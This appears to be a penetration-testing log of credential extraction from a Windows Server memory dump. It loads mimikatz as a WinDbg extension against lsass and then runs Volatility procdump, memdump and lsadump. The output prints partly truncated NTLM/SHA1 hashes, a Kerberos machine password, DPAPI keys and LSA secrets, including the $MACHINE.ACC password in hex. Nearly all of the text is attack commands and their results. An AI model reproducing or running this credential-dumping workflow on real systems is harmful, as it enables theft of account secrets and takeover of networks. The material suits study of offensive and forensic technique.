         UseExperimentalFeatureForNugetShare : true
         AllowNugetExeUpdate : true
         NonInteractiveNuget : true
         AllowNugetMSCredentialProviderInstall : true
         AllowParallelInitializationOfLocalRepositories : true
         EnableRedirectToV8JsProvider : false
         -- Configuring repositories
            ----> Repository : LocalInstalled, Enabled: true
            ----> Repository : UserExtensions, Enabled: true
      
      >>>>>>>>>>>>> Preparing the environment for Debugger Extensions Gallery repositories completed, duration 0.000 seconds
      ************* Waiting for Debugger Extensions Gallery to Initialize **************
      >>>>>>>>>>>>> Waiting for Debugger Extensions Gallery to Initialize completed, duration 0.016 seconds
         ----> Repository : UserExtensions, Enabled: true, Packages count: 0
         ----> Repository : LocalInstalled, Enabled: true, Packages count: 41
      
      Microsoft (R) Windows Debugger Version 10.0.27553.1004 AMD64
      Copyright (c) Microsoft Corporation. All rights reserved.
      
      Loading Dump File [C:\Temp\memory.dmp]
      Kernel Complete Dump File: Full address space is available
      
      Comment: 'File was converted with Volatility'
      
      ************* Path validation summary **************
      Response                         Time (ms)     Location
      OK                                             c:\mysymbols
      Deferred                                       cache*c:\symbolcache
      Deferred                                       SRV*c:symbols*http://msdl.microsoft.com/download/symbols
      Deferred                                       srv*
      Symbol search path is: c:\mysymbols;cache*c:\symbolcache;SRV*c:symbols*http://msdl.microsoft.com/download/symbols;srv*
      Executable search path is: 
      Windows 10 Kernel Version 14393 MP (2 procs) Free x64
      Product: Server, suite: TerminalServer SingleUserTS
      Edition build lab: 14393.2248.amd64fre.rs1_release.180427-1804
      Kernel base = 0xfffff801`6c683000 PsLoadedModuleList = 0xfffff801`6c98a160
      Debug session time: Tue Apr  2 06:40:31.471 2024 (UTC + 2:00)
      System Uptime: 0 days 0:52:40.225
      Loading Kernel Symbols
      ...............................................................
      ................................................................
      ............
      Loading User Symbols
      ................................................................
      .........................................................
      Loading unloaded module list
      .............
      Unknown exception - code 45474150 (first/second chance not available)
      The context is partially valid. Only x86 user-mode context is available.
      For analysis of this file, run !analyze -v
      00000000`00000000 ??              ???

      16.0: kd:x86> .load C:\Temp\mimilib.dll
      
        .#####.   mimikatz 2.2.0 (x64) built on Sep 19 2022 17:44:00
       .## ^ ##.  "A La Vie, A L'Amour" - Windows build 14393
       ## / \ ##  /* * *
       ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
       '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
        '#####'                                  WinDBG extension ! * * */
      
      ===================================
      #         * Kernel mode *         #
      ===================================
      # Search for LSASS process
      0: kd> !process 0 0 lsass.exe
      # Then switch to its context
      0: kd> .process /r /p <EPROCESS address>
      # And finally :
      0: kd> !mimikatz
      ===================================
      #          * User mode *          #
      ===================================
      0:000> !mimikatz
      ===================================

      16.0: kd:x86> .load wow64exts
      
      16.0: kd:x86> !wow64exts.sw
      Switched to Host mode

      16.0: kd> !process 0 0 lsass.exe
      PROCESS ffff86882ae98700
          SessionId: 0  Cid: 0228    Peb: 11f7bff000  ParentCid: 01a0
          DirBase: 109a15000  ObjectTable: ffffbe83cc682740  HandleCount: <Data Not Accessible>
          Image: lsass.exe
      
      16.0: kd> .process /r /p ffff86882ae98700
      Implicit process is now ffff8688`2ae98700
      Loading User Symbols
      ................................................................
      ........
      
      16.0: kd> !mimikatz
      
      DBGHELP: c:\symbolcache*c:symbols*http://msdl.microsoft.com/download/symbols is not a valid store
      
      DPAPI Backup keys
      =================
      Current prefered key:       {00000000-0000-0000-0000-000000000000}
      Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
      
      DPAPI System
      ============
      full: 056015afc75e9d0db81a263f41feaa55ffc0533d332812a4441ba8ec4b89c74848<SNIP>
      m/u : 056015afc75e9d0db81a263f41feaa55ffc0533d / 332812a4441ba8ec4b89c74<SNIP>
      
      SekurLSA
      ========
      
      Authentication Id : 0 ; 90399 (00000000:0001611f)
      Session           : Service from 0
      User Name         : OracleOraDB21Home1TNSListener
      Domain            : NT SERVICE
      Logon Server      : 
      Logon Time        : 4/2/2024 5:48:03 AM
      SID               : S-1-5-80-1374824361-465945973-1635723809-3190017912-3513974881
      	msv : 
      	 [00000003] Primary
      	 * Username : ORACLESERVER1$
      	 * Domain   : COMPANY
      	 * NTLM     : b8b9f0dedfe8fd3180ee6<SNIP>
      	 * SHA1     : f986a2ec0fe41a6d7f81e<SNIP>
      	tspkg : KO
      	wdigest : 
      	 * Username : ORACLESERVER1$
      	 * Domain   : COMPANY
      	 * Password : (null)
      	kerberos : 
      	 * Username : ORACLESERVER1$
      	 * Domain   : company.work
      	 * Password : WHp,Cz@yBVhpgp#.522Rt<SNIP>
      	 * Key List
      <SNIP>
      
      Authentication Id : 0 ; 1365963 (00000000:0014d7cb)
      Session           : Interactive from 1
      User Name         : Administrator
      Domain            : ORACLESERVER1
      Logon Server      : ORACLESERVER1
      Logon Time        : 4/2/2024 6:02:16 AM
      SID               : S-1-5-21-1644803877-2661921197-3301414406-500
      	msv : 
      	 [00000003] Primary
      	 * Username : Administrator
      	 * Domain   : ORACLESERVER1
      	 * NTLM     : cf3a5525ee9414229e66<SNIP>
      	 * SHA1     : 3c7374127c9a60f9e5b2<SNIP>
      	tspkg : KO
      	wdigest : 
      	 * Username : Administrator
      	 * Domain   : ORACLESERVER1
      	 * Password : (null)
      	kerberos : 
      	 * Username : Administrator
      	 * Domain   : ORACLESERVER1
      	 * Password : (null)
      	ssp : 
      	masterkey : 
      	 [00000000]
      	 * GUID      :	{d9ba3631-593c-4347-9bb5-7f32aa0737d9}
      <SNIP>



================================================
Others tests...
================================================

C:\Temp> volatility_2.6_win64_standalone.exe -f volatilememory.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_14393, Win10x64_10586, Win10x64, Win2016x64_14393
                     AS Layer1 : Win10AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Temp\volatilememory.raw)
                      PAE type : No PAE
                           DTB : 0x1aa000L
                          KDBG : 0xf8016c9758e0L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8016c9c7000L
                KPCR for CPU 1 : 0xffff998069c00000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2024-04-02 04:40:31 UTC+0000
     Image local date and time : 2024-04-01 21:40:31 -0700

C:\Temp> volatility_2.6_win64_standalone.exe hivelist -f volatilememory.raw --profile Win2016x64_14393
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffbe83d308d000 0x000000008a4a1000 \??\C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat
0xffffbe83c8a30000 0x0000000000e3f000 [no name]
0xffffbe83c8a3d000 0x00000000002e3000 \REGISTRY\MACHINE\SYSTEM
0xffffbe83c8a7c000 0x0000000000e6f000 \REGISTRY\MACHINE\HARDWARE
0xffffbe83c8b62000 0x000000000232b000 \SystemRoot\System32\Config\DEFAULT
0xffffbe83c9273000 0x0000000002220000 \SystemRoot\System32\Config\SAM
0xffffbe83c8b5e000 0x0000000002326000 \SystemRoot\System32\Config\SECURITY
0xffffbe83c9283000 0x000000000222f000 \SystemRoot\System32\Config\SOFTWARE
0xffffbe83c9633000 0x0000000101e79000 \Device\HarddiskVolume1\Boot\BCD
0xffffbe83cc76a000 0x000000010b75e000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffbe83cc8a8000 0x00000001087b1000 \SystemRoot\System32\Config\BBI
0xffffbe83cc906000 0x0000000103047000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffbe83d15c7000 0x000000012f617000 \??\C:\Users\OracleOraDB21Home1TNSListener\ntuser.dat
0xffffbe83d15be000 0x000000012f663000 \??\C:\Users\OracleServiceXE\ntuser.dat
0xffffbe83d15c2000 0x000000012f66e000 \??\C:\Users\OracleOraDB21Home1MTSRecoveryService\ntuser.dat
0xffffbe83d15c0000 0x000000012f669000 \??\C:\Users\OracleVssWriterXE\ntuser.dat
0xffffbe83d182e000 0x000000012effe000 \??\C:\Users\OracleOraDB21Home1TNSListener\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffbe83d1850000 0x000000012eefd000 \??\C:\Users\OracleServiceXE\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffbe83d1871000 0x000000012ee5f000 \??\C:\Users\OracleOraDB21Home1MTSRecoveryService\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffbe83d189a000 0x000000012ee0c000 \??\C:\Users\OracleVssWriterXE\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffbe83d2d71000 0x000000006abc8000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffbe83d39f1000 0x00000000a6a2e000 \??\C:\Users\Administrator\ntuser.dat
0xffffbe83d3ad7000 0x00000000ac4af000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffbe83d3ea4000 0x000000008a72d000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
0xffffbe83d110f000 0x0000000004bd6000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
0xffffbe83d3093000 0x0000000001253000 \??\C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat


C:\Temp>volatility_2.6_win64_standalone.exe -f volatilememory.raw --profile Win2016x64_14393 procdump -p 552 --dump-dir="C:\temp"
Volatility Foundation Volatility Framework 2.6
Process(V)         ImageBase          Name                 Result
------------------ ------------------ -------------------- ------
0xffff86882ae98700 0x00007ff680080000 lsass.exe            OK: executable.552.exe


C:\Temp>volatility_2.6_win64_standalone.exe -f volatilememory.raw --profile Win2016x64_14393 memdump -p 552 --dump-dir="C:\temp"
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing lsass.exe [   552] to 552.dmp


C:\Temp> volatility_2.6_win64_standalone.exe -f volatilememory.raw --profile Win2016x64_14393 lsadump
Volatility Foundation Volatility Framework 2.6
_SC_OracleJobSchedulerXE
0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000010  e4 ef a2 df 5c d9 2c 19 4c d2 48 2c e6 37 bc b0   ....\.,.L.H,.7..

DefaultPassword
0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000010  b4 d0 6d aa a6 fb e0 53 45 20 bc 96 be ef 8d c3   ..m....SE.......

NL$KM
0x00000000  40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   @...............
0x00000010  10 f7 7a 45 ec c9 0e 03 fc c7 1e 22 f4 2e 42 1b   ..zE......."..B.
0x00000020  ea 90 d2 13 18 77 d9 76 43 ec bc ee c2 fa af 14   .....w.vC.......
0x00000030  62 bb cc 93 e0 51 40 76 17 c9 d7 e9 e0 da 97 16   b....Q@v........
0x00000040  d8 71 2f 7b bd bc 31 a1 59 d9 4b 81 f8 ab 5d 6f   .q/{..1.Y.K...]o
0x00000050  a2 0c a1 a5 9c 2c 32 87 db d9 bd 64 a6 e5 0c 76   .....,2....d...v

_SC_OracleVssWriterXE
0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000010  15 74 7d 07 4a b5 a4 e0 78 54 44 6a df 49 1e 7d   .t}.J...xTDj.I.}

_SC_OracleOraDB21Home1MTSRecoveryService
0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000010  3f 8f 50 e4 2e 26 5e 23 12 5a b1 e6 ff 02 78 f4   ?.P..&^#.Z....x.

$MACHINE.ACC
0x00000000  f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000010  57 00 48 00 70 00 2c 00 43 00 7a 00 40 00 79 00   W.H.p.,.C.z.@.y.
0x00000020  42 00 56 00 68 00 70 00 67 00 70 00 23 00 2e 00   B.V.h.p.g.p.#...
0x00000030  35 00 32 00 32 00 52 00 74 00 54 00 37 00 65 00   5.2.2.R.t.T.7.e.
0x00000040  57 00 78 00 35 00 6a 00 71 00 2c 00 30 00 28 00   W.x.5.j.q.,.0.(.
0x00000050  28 00 2e 00 29 00 3e 00 4b 00 73 00 37 00 3f 00   (...).>.K.s.7.?.
0x00000060  58 00 3f 00 2c 00 33 00 6f 00 40 00 22 00 58 00   X.?.,.3.o.@.".X.
0x00000070  76 00 2c 00 5b 00 27 00 22 00 47 00 5e 00 49 00   v.,.[.'.".G.^.I.
0x00000080  36 00 5d 00 3d 00 6d 00 68 00 64 00 2f 00 69 00   6.].=.m.h.d./.i.
0x00000090  53 00 68 00 74 00 5b 00 72 00 40 00 76 00 44 00   S.h.t.[.r.@.v.D.
0x000000a0  44 00 74 00 41 00 68 00 31 00 38 00 48 00 6a 00   D.t.A.h.1.8.H.j.
0x000000b0  3f 00 59 00 70 00 25 00 71 00 60 00 36 00 6c 00   ?.Y.p.%.q.`.6.l.
0x000000c0  4a 00 64 00 77 00 3c 00 47 00 62 00 2f 00 2a 00   J.d.w.<.G.b./.*.
0x000000d0  65 00 39 00 50 00 70 00 77 00 3a 00 57 00 61 00   e.9.P.p.w.:.W.a.
0x000000e0  6d 00 75 00 5e 00 27 00 2f 00 2c 00 32 00 64 00   m.u.^.'./.,.2.d.
0x000000f0  2a 00 77 00 46 00 59 00 50 00 62 00 4f 00 6c 00   *.w.F.Y.P.b.O.l.
0x00000100  cc 2a de 79 34 61 96 8a 9b 92 a1 fa 0a 9c b4 9e   .*.y4a..........

DPAPI_SYSTEM
0x00000000  2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ,...............
0x00000010  01 00 00 00 05 60 15 af c7 5e 9d 0d b8 1a 26 3f   .....`...^....&?
0x00000020  41 fe aa 55 ff c0 53 3d 33 28 12 a4 44 1b a8 ec   A..U..S=3(..D...
0x00000030  4b 89 c7 48 48 4b 65 8f b3 62 2a 50 00 00 00 00   K..HHKe..b*P....

